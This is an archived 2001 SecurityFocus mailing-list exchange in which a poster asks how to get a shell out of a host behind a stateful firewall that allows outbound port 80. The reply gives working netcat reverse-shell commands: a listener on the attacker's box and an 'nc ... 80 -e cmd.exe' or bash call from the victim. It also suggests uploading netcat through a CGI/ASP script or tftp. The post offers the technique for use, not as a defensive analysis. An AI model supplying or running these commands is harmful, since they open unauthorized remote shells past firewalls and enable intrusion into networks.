You want netcat, you can find in on packetstorm. What you will need to do first is build an CGI/ASP script to upload your code, assuming you can't just tftp it from the internal system. Then on your box execute: nc -l -p 80 On the remote server execute nc <yourbox> 80 -e c:\winnt\system32\cmd.exe or /usr/bin/bash or whatever command interpeter is handy. You will then see a command prompt appear on your local box. Sounds like the hard part will be getting netcat on the box. Good luck! Ilici Ramirez wrote: > > Hi, > > Lets suppose that I can execute a program on an inside > host on a network protected by a firewall. There is no > way in. But there is a way out to www browsing on port > 80. > > So the client could connect to any Internet address on > port 80. What program should it execute to provide me > with a shell? Of course I'm in Internet with a > listener. What listener? > > The firewall is a real statefull firewall so no TCP > ACK or ICMP encapsulations. > > Have a nice weekend too. > > Ilici R > > __________________________________________________ > Terrorist Attacks on U.S. - How can you help? > Donate cash, emergency relief information > http://dailynews.yahoo.com/fc/US/Emergency_Information/ > > ---------------------------------------------------------------------------- > This list is provided by the SecurityFocus Security Intelligence Alert (SIA) > Service. For more information on SecurityFocus' SIA service which > automatically alerts you to the latest security vulnerabilities please see: > https://alerts.securityfocus.com/ -- Bill Pennington - CISSP ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Fri Sep 21 2001 - 16:39:37 PDT